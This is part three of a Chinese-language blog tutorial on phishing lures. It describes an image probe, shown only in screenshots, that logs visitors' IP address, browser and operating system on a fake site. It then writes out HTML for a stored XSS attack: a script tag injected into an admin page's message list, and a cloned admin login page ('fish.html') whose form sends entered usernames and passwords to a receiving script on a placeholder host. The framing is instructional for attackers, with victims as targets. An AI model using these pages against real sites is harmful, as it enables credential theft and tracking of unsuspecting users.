主页 > 网络知识 > 邮箱钓鱼的诱饵(3)

邮箱钓鱼的诱饵(3)

 

1609041119_5fe804df9e2a9528b62d3.png!small?1609041119077

 

 

1609041144_5fe804f81342be4656ec3.png!small?1609041143536

 

1、利用图片探针获取访问者IP地址、浏览器等信息

 

1609041153_5fe8050133861797967b6.png!small?1609041152656

 

.htaccess文件内容如下:

 

1609041159_5fe8050764ba2c6014a63.png!small?1609041158843

 

info.php实现起来比较简单,就是通过http请求头来获取当前IP地址、UA等信息并记录到日志文件当中。

 

1609041185_5fe80521e7c704bcf3e41.png!small?1609041185376

 

 

1609041245_5fe8055d6279f8dfee681.png!small?1609041244928

 

 

1609041251_5fe80563d5f1637fa0c5c.png!small?1609041251350

 

一切准备就绪,访问搭建好的伪造网站,等待受害者访问即可获取访问者的IP地址、UA、操作系统、浏览器等信息

 

1609041450_5fe8062a4b0335332856f.png!small?1609041449819

 

2、利用XSS获取登录用户名密码

代码文件如下:

 

1609041465_5fe8063963288ab712eb5.png!small?1609041464880

 

代码量很小,我在这里直接贴出来

//admin_login.html 本来的管理员登录页面

<html> <body> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理员登录</title></head> <form method="post" action="http://xxx/x.xx"> 用户名:<br> <input type="text"> <br> 密码:<br> <input type="text"> <br><br> <input type="submit" value="登录"> </form> </body> </html>

//admin_index.html 原本的管理后台页面

<html> <body> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理员后台</title></head> <h1>这里是管理员后台,你已成功登录</h1> <button type="button">一键日卫星</button> <hr><b>最新留言</b> <ul> <li>Zoro好帅</li> <li>楼上说得对</li> <script src= "xss.js"></script> </ul> </body> </html>

//fish.html 我们仿的登录页面,也就是钓鱼页

<body> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理员登录</title></head> <form method="post" action="http://getpasswd/get.php">//这里发送给接收程序 用户名:<br> <input type="text"> <br> 密码:<br> <input type="text"> <br><br> <input type="submit" value="Submit"> </form> </body> </html>

//get.php 数据接收文件

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!